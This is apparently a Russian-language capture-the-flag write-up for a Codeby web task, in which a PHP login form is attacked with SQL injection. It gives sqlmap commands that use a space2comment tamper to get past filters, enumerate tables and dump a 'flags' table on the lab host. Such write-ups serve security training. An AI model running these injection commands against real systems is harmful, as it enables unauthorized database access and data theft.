Автор: @Vespii
Ссылка на таск Codeby:
https://codeby.games/categories/web/24975f4e-cd03-4fee-a511-b7477ac4458c
Описание задания
Я решил переделать свой прошлый проект и переписал его на PHP, а также добавил защитные фильтры.
Держи тестовые креды:
login=test, password=test.
62.173.140.174:16015
Решение
На web сайте присутствует форма авторизации
Зайдем с помощью кредов test:test. Ничего интересного
В коде элемента видим запрос к базе данных
Запустим sqlmap:
sqlmap -u 'http://62.173.140.174:16015/user.php?login=test&password=test' --batch --tables --risk 3 --level 3 --tamper=space2comment
Утилита вывела таблицы. Нас интересует flags
Выведем все из таблицы flags
sqlmap -u 'http://62.173.140.174:16015/user.php?login=test&password=test' --batch --tables --risk 3 --level 3 --tamper=space2comment -T flags --dump
Tags: